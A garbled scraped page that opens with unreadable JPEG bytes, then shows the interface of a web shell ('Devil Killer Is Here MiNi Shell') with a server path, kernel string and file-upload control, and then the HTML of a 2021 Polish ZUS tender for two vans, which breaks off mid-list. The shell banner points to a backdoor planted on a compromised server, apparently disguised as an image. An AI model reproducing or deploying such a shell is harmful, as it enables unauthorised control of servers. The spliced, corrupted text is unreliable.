JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210727/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210727/0012803001-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00128030 z dnia 2021-07-27</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Zakup dwóch samochodów osobowo – ciężarowych dla Oddziału ZUS w Sosnowcu </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">ZAKŁAD UBEZPIECZEŃ SPOŁECZNYCH ODDZIAŁ W SOSNOWCU</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Oddział w Sosnowcu</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 00001775600410</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Partyzantów 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Sosnowiec</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">41-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL22B - Sosnowiecki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">ZAP_sosnowiec@zus.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zus.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - Zakład Ubezpieczeń Społecznych lub Kasa Rolniczego Ubezpieczenia Społecznego oraz zarządzane przez nie fundusze</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Ubezpieczenia Społeczne </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zakup dwóch samochodów osobowo – ciężarowych dla Oddziału ZUS w Sosnowcu </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-d4387063-eeb2-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00128030</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-07-27</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00000705/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Zakup dwóch samochodów osobowo - ciężarowych dla O/ZUS w Sosnowcu </p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://portal.smartpzp.pl/zus <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://portal.smartpzp.pl/zus</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.	Za pośrednictwem posiadanego na Platformie zakupowej konta Użytkownika Zewnętrznego tj. użytkownika Wykonawcy, odbywa się komunikacja Wykonawcy z Zamawiającym w postępowaniu, w szczególności: przekazywanie dokumentów, oświadczeń, informacji, pytań, wniosków w ramach postępowania.<br/>2.	Zadawanie pytań przez Wykonawców odbywa się w zakładce „Pytania do postępowania”. Po otwarciu ofert, komunikacja między Zamawiającym a Wykonawcami, w tym wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje, przekazywane są elektronicznie za pośrednictwem Platformy zakupowej, w zakładce „Korespondencja”, która dla Wykonawcy jest widoczna w Zakładce „Oferty”, po zaznaczeniu numeru złożonej oferty. <br/>3.	Do korzystania z Platformy zakupowej przez Użytkowników Zewnętrznych konieczne jest posiadanie przez co najmniej jednego uprawnionego Użytkownika Zewnętrznego Wykonawcy kwalifikowanego podpisu elektronicznego lub podpisu zaufanego lub podpisu osobistego służącego do autentykacji i podpisu.<br/>4.	Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych i informacji przekazywanych przy ich użyciu zostały opisane w Regulaminie korzystania z usług Platformy zakupowej (Regulamin Portalu e-Usług) dostępnym z poziomu modułu E-learning dla wszystkich użytkowników Platformy zakupowej oraz podczas rejestracji konta Wykonawcy dla Wykonawców, pod adresem: https://portal.smartpzp.pl/zus <br/>5.	Użycie przez Wykonawcę do kontaktu z Zamawiającym środków komunikacji elektronicznej zapewnionych na Platformie zakupowej jest uzależnione od uprzedniej akceptacji przez Wykonawcę Regulaminu korzystania z usług Platformy zakupowej na witrynie internetowej przy zakładaniu profilu Wykonawcy.<br/>6.	Korzystanie z Platformy zakupowej przez Wykonawców jest bezpłatne.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zamawiający obowiązany jest do spełnienia obowiązku informacyjnego z art. 13 RODO względem osób fizycznych, od których dane osobowe bezpośrednio pozyskał. Zakład Ubezpieczeń Społecznych stosując przepisy rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE, podaje zgodnie z art. 13 RODO informację dotyczącą przetwarzania Pani/ Pana danych osobowych.<br/>1.	Administratorem Pani/Pana danych osobowych jest Zakład Ubezpieczeń Społecznych ul. Szamocka 3, 5, 01-748 Warszawa, <br/>2.	W sprawach dotyczących przetwarzania danych osobowych oraz korzystania z praw związanych z przetwarzaniem danych został wyznaczony Inspektor Ochrony Danych, z którym można skontaktować się w następujący sposób:<br/>1)	listownie na adres:<br/>Inspektor Ochrony Danych<br/>Zakład Ubezpieczeń Społecznych,<br/>ul. Szamocka 3, 5,<br/>01-748 Warszawa<br/>2)	przez e-mail: ODO@zus.pl.<br/>3.	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego pn. „Zakup dwóch samochodów osobowo – ciężarowych dla O/ZUS w Sosnowcu” i nie będą przekazywane odbiorcom danych osobowych, chyba że inaczej wynikać będzie z przepisów prawa.<br/>4.	Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy, związanym z udziałem <br/>w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy.<br/>5.	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 Ustawy pzp, przez okres 4 lat od dnia zakończenia postepowania o udzielenie zamówienia, co jest związane <br/>z czasem w jakim Umowa wraz z załącznikami podlega obowiązkowi jej archiwizacji.<br/>6.	Odbiorcami Pani/Pana danych osobowych mogą być osoby lub podmioty, które w ramach sprawowania uprawnień kontrolnych lub nadzoru nad Zamawiającym zażądają udostępniania Umowy wraz z załącznikami i którym Zamawiający będzie zobowiązany do udostępnienia zawartej Umowy w oparciu o art. 18 oraz art. 74 Ustawy pzp. <br/>7.	W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO.<br/>8.	Osoby, których dane będą przetwarzane posiadają:<br/>1)	na podstawie art. 15 RODO prawo dostępu do danych osobowych ich dotyczących oraz do uzyskania informacji w nim wymienionych; <br/>2)	na podstawie art. 16 RODO prawo do sprostowania ich danych osobowych;<br/>3)	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO;<br/>4)	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uznają, że przetwarzanie danych ich osobowych dotyczących narusza przepisy RODO.<br/>9.	Osobom, których dane będą przetwarzane nie przysługuje:<br/>1)	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>2)	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>3)	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną ich przetwarzania jest art. 6 ust. 1 lit. c RODO.<br/>10.	W celu zapewnienia, że Wykonawca wypełnił ww. obowiązki informacyjne oraz ochrony prawnie uzasadnionych interesów osoby trzeciej, której dane zostały przekazane w związku z udziałem Wykonawcy w postępowaniu, Wykonawca złoży w postępowaniu o udzielenie zamówienia publicznego oświadczenie zawarte w Formularzu oferty o wypełnieniu przez niego obowiązków informacyjnych przewidzianych w art. 13 lub art. 14 RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">380000/271/06/2021-ZAP</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część I – Zakup i dostawa samochodu osobowo – ciężarowego 2 + 1;<br/>1)	Dane pojazdu: <br/>a)	rok produkcji: 2021, <br/>b)	wersja nadwozia: osobowo-ciężarowy tupu furgon, <br/>c)	liczba miejsc siedzących: 3 w jednym rzędzie, <br/>d)	lakier nadwozia: srebrny metalizowany lub metalizowany w odcieniach szarości, <br/>e)	wnętrze: tapicerka materiałowa w ciemnym odcieniu, <br/>f)	rozstaw osi: co najmniej 2900 mm, <br/>g)	rozstaw kół (przód, tył): co najmniej 1600 mm, <br/>h)	długość: co najmniej 4800 mm, <br/>i)	maksymalna wysokość: 2100 mm, <br/>j)	ładowność: co najmniej 900 kg, <br/>k)	dopuszczalna masa całkowita: do 3500 kg, <br/>l)	pojazd przystosowany do ruchu prawostronnego z kierownicą po lewej stronie. <br/>2)	Silnik z układem przeniesienia mocy: <br/>a)	paliwo: olej napędowy ON, <br/>b)	pojemność silnika: od 1400 cm³ do 2200 cm³, <br/>c)	liczba cylindrów: 4, <br/>d)	moc silnika: co najmniej 120 KM, <br/>e)	skrzynia biegów: manualna co najmniej 5 biegów do przodu i bieg wsteczny, <br/>f)	przekazanie napędu: na przednią lub tylną oś, <br/>g)	pojemność zbiornika paliwa: co najmniej 65 litrów, <br/>h)	norma emisji spalin: Euro 6d zgodnie z powszechnie obowiązującymi przepisami dotyczącymi emisji spalin, <br/>i)	emisja CO2 cykl mieszany wg normy WLTP: maksymalna 199 g/km. <br/>3)	Wyposażenie:<br/>a)	pełna, metalowa przegroda (z szybą lub bez) oddzielająca przestrzeń ładunkową od kabiny,<br/>b)	centralny zamek sterowany pilotem – minimum dwa piloty, <br/>c)	czujniki parkowania – co najmniej tylne, <br/>d)	dywaniki podłogowe – gumowe,<br/>e)	drzwi boczne przesuwane po prawej stronie lub po obu stronach nadwozia, <br/>f)	drzwi tylne dwuskrzydłowe otwierane pod kątem 180 stopni z ogranicznikiem przy 90 stopniach, <br/>g)	elektrycznie sterowane szyby, <br/>h)	elektrycznie sterowane lusterka zewnętrzne, <br/>i)	fotele tapicerowane z zagłówkami, <br/>j)	gniazdo 12V – co najmniej jedno, <br/>k)	immobilizer, <br/>l)	klimatyzacja – manualna lub automatyczna, <br/>m)	kolumna kierownicza regulowana co najmniej w jednej płaszczyźnie, <br/>n)	komputer pokładowy z funkcją rejestracji chwilowego zużycia paliwa, średniego zużycia paliwa, zasięgu, <br/>o)	lusterka zewnętrzne oraz klamki drzwi w kolorze tworzywa lub lakierowane w kolorze nadwozia, <br/>p)	obręcze kół stalowe z kołpakami co najmniej w rozmiarze 16” (4 szt.), <br/>q)	ochronne listwy boczne, <br/>r)	oświetlenie wnętrza co najmniej 1 lampka, <br/>s)	podłoga przestrzeni ładunkowej pokryta wykładziną antypoślizgową lub matą lub tworzywem sztucznym, <br/>t)	poduszka powietrzna dla kierowcy i pasażera,<br/>u)	schowek w desce rozdzielczej po stronie pasażera, <br/>v)	system kontroli ciśnienia w oponach, <br/>w)	system przeciwdziałania poślizgowi kół napędowych podczas gwałtownego przyspieszania lub ruszania, <br/>x)	system nagłośnienia z co najmniej 2 głośnikami, <br/>y)	system stabilizacji toru jazdy, <br/>z)	system zapobiegający blokowaniu kół podczas hamowania, <br/>aa)	ściany boczne przestrzeni ładunkowej bez szyb zabudowane tworzywem sztucznym lub panelami ochronnymi, <br/>bb)	światła do jazdy dziennej, <br/>cc)	tempomat, <br/>dd)	trzecie światło stop, <br/>ee)	trzypunktowe pasy bezpieczeństwa, <br/>ff)	tuner radiowy fabryczny, <br/>gg)	wspomaganie układu kierowniczego, <br/>hh)	zaczepy do mocowania ładunku w podłodze lub słupkach bocznych w przestrzeni ładunkowej, <br/>ii)	zestaw głośnomówiący fabryczny,<br/>jj)	koło zapasowe pełnowymiarowe lub koło dojazdowe wraz z zestawem narzędzi niezbędnym do jego wymiany zamontowane w pojeździe w sposób nieograniczający przestrzeni ładunkowej lub zamontowane pod pojazdem. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">34115200-8 - Pojazdy silnikowe do transportu mniej niż 10 osób</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">34100000-8 - Pojazdy silnikowe</p> <p class="mb-0">34110000-1 - Samochody osobowe</p> <p class="mb-0">34136100-0 - Lekkie samochody półciężarowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2021-12-15</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za ofertę najkorzystniejszą zostanie uznana oferta, która uzyska<br/>najkorzystniejszy bilans przyjętych kryteriów obliczony według niżej podanego wzoru:<br/>O = C + Gw + Gn + Z<br/>gdzie:<br/>O – ocena łączna<br/>C – liczba punktów uzyskanych w kryterium Cena brutto oferty<br/>Gw – liczba punktów uzyskanych w kryterium Gwarancja na silnik, części mechaniczne, elektryczne, hydrauliczne i elementy wyposażenia<br/>Gn – liczba punktów uzyskanych w kryterium Gwarancja na perforację nadwozia<br/>Z – liczba punktów uzyskanych w kryterium Zużycie energii<br/><br/>Przyznawane punkty we wszystkich kryteriach będą zaokrąglane do dwóch miejsc po przecinku zgodnie z zasadami matematycznymi, tzn. jeżeli trzecie miejsce po przecinku wynosi od 0 do 4 to drugie miejsce po przecinku pozostaje niezmienione, jeżeli trzecie miejsce po przecinku wynosi od 5 do 9 to drugie miejsce po przecinku należy zaokrąglić w górę. <br/>W przypadku, gdy nie będzie można dokonać wyboru oferty najkorzystniejszej ze względu na to, że dwie lub więcej oferty przedstawiają taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający spośród tych ofert wybierze ofertę z najniższą ceną, a jeżeli zostały złożone oferty o takiej samej cenie, Zamawiający wezwie Wykonawców, którzy złożyli te oferty, do złożenia w określonym terminie ofert dodatkowych z zastrzeżeniem, że zaproponowana cena w ofertach dodatkowych nie może być wyższa<br/>niż cena w złożonej przez Wykonawcę ofercie.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja na silnik, części mechaniczne, elektryczne, hydrauliczne i elementy wyposażenia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">25,00</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja na perforację nadwozia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10,00</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Zużycie energii</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">5,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część II – Zakup i dostawa samochodu osobowo - ciężarowy 4+1. <br/>1)	Dane pojazdu: <br/>a)	rok produkcji: 2021, <br/>b)	wersja nadwozia: zamknięte typu kombivan, <br/>c)	liczba miejsc siedzących: 5,<br/>d)	lakier nadwozia: metalizowany srebrny lub metalizowany w odcieniach szarości, <br/>e)	wnętrze: tapicerka materiałowa w ciemnym odcieniu, <br/>f)	rozstaw osi: co najmniej 2650 mm, <br/>g)	rozstaw kół (przód, tył): co najmniej 1500 mm, <br/>h)	długość: co najmniej 4250 mm,<br/>i)	ładowność: co najmniej 550 kg, <br/>j)	pojazd przystosowany do ruchu prawostronnego z kierownicą po lewej stronie.<br/>2)	Silnik z układem przeniesienia mocy: <br/>a)	paliwo: olej napędowy ON,<br/>b)	pojemność silnika: od 1100 cm³ do 1600 cm³, <br/>c)	liczba cylindrów: 4, <br/>d)	moc silnika: co najmniej 100 KM, <br/>e)	skrzynia biegów: manualna co najmniej 5 biegów do przodu i bieg wsteczny, <br/>f)	przekazanie napędu: na przednią oś, <br/>g)	pojemność zbiornika paliwa: co najmniej 45 litrów, <br/>h)	norma emisji spalin: Euro 6d zgodnie z powszechnie obowiązującymi przepisami dotyczącymi emisji spalin, <br/>i)	emisja CO2 cykl mieszany wg normy WLTP: maksymalna 180 g/km. <br/>3)	Wyposażenie: <br/>a)	centralny zamek sterowany pilotem – minimum dwa piloty, <br/>b)	czujniki parkowania – co najmniej tylne, <br/>c)	drzwi boczne przesuwane i przeszklone po prawej stronie lub po obu stronach nadwozia, <br/>d)	drzwi tylne dwuskrzydłowe z podgrzewanymi szybami i wycieraczką, otwierane pod kątem 180 stopni z ogranicznikiem przy 90 stopniach lub klapa tylna z podgrzewaną szybą i wycieraczką, <br/>e)	dywaniki podłogowe – gumowe z przodu i z tyłu, <br/>f)	elektrycznie lub ręcznie sterowane lusterka zewnętrzne, <br/>g)	elektrycznie sterowane szyby co najmniej z przodu, <br/>h)	fotele tapicerowane z zagłówkami, <br/>i)	gniazdo 12V – co najmniej jedno, <br/>j)	immobilizer, <br/>k)	klimatyzacja – manualna lub automatyczna, <br/>l)	kolumna kierownicza regulowana co najmniej w jednej płaszczyźnie, <br/>m)	komputer pokładowy z funkcją rejestracji chwilowego zużycia paliwa, średniego zużycia paliwa, zasięgu,<br/>n)	lusterka zewnętrzne oraz klamki drzwi w kolorze tworzywa lub lakierowane w kolorze nadwozia, <br/>o)	lusterko wsteczne, <br/>p)	obręcze kół stalowe z kołpakami co najmniej w rozmiarze 15” (4 szt.), <br/>q)	ochronne listwy boczne, <br/>r)	oświetlenie wnętrza co najmniej 1 lampka, <br/>s)	pełne przeszklenie przedziału pasażersko-ładunkowego, <br/>t)	podłoga 